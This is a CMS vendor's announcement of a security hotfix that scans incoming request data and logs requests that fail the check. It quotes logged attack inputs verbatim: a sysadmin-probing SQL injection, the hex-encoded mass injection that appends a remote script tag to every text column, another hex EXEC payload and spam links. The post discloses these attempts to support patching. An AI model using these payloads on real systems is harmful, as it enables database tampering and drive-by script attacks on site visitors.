As you hopefully know we released an update of Dynamicweb yesterday containing a security hotfix - this was due to a vulnerability in a specific function in Dynamicweb.
Dynamicweb has always made a number of checks on incoming data - this is done automatically when using Base.Request() in code instead of Request.Querystring, Request.Form or postback data - but the checks are only done if using Base.Request.
A lot of custom modules do not use this approach and this can be a security risk - it can be used for SQL-injection and html/javascript injections as well.
These risks are of course old news to developers – but that does not mean that the appropriate measures are taken to accommodate this all the time.
The release we made yesterday contains, apart from a general update of the scan, a new feature to prevent attacks weather the code is ‘good’ or not in this regard. It’s a general surveillance of all data sent to Dynamicweb in GET and POST requests. So all data in these collections are scanned before any code is executed in Dynamicweb – if data is failing a check the request is abandoned and the request is logged by us (as of yesterday).
This has already given a lot of interesting log entries (250+) – most of it coming from all sorts of automatic tools.
Furtherdown I’ve listed some of them for you to see.
So – if you have customers not hosting at Hostnordic, please make sure they get this release soon. Solutions need a Dynamicweb.dll newer than 8th May 2008 to have this fix/feature. The newest release can be found in the download section.
|
id:
|
74814
|
|
ImageID:
|
3362 and 1=(select IS_SRVROLEMEMBER('sysadmin'))
|
|
id:
|
3144;dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;--
|
|
NewsID:
|
55';DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004C004100520045002000400054002000760061007200630
0680061007200280032003500350029002C00400043002000760061007200630
06800610072002800320035003500290020004400450043004C0041005200450020
005400610062006C0065005F0043007500720073006F00720020004300550052005
3004F005200200046004F0052002000730065006C00650063007400200061002E0
06E0061006D0065002C0062002E006E0061006D0065002000660072006F006D002
0007300790073006F0062006A006500630074007300200061002C00730079007300
63006F006C0075006D006E0073002000620020007700680065007200650020006100
2E00690064003D0062002E0069006400200061006E006400200061002E00780074007
900700065003D00270075002700200061006E0064002000280062002E007800740079
00700065003D003900390020006F007200200062002E00780074007900700065003D0
03300350020006F007200200062002E00780074007900700065003D0032003300310 AS NVARCHAR(4000));EXEC(@S);--
|
|
ID:
|
5723?ID=5723
|
|
_PID:
|
15471
|
|
_M:
|
Shop
|
|
Search:
|
True
|
|
ShopSearchText:
|
http://index8.tigogo.com >questions i-say http://index2.tigogo.com >valdosta ga newspaper http://index7.tigogo.com >gaston.k12.nc us http://index1.tigogo.com >forty-three year old anthony thompson http://index6.tigogo.com >uscourts
|
|
ID:
|
20
|
|
q:
|
'OR
|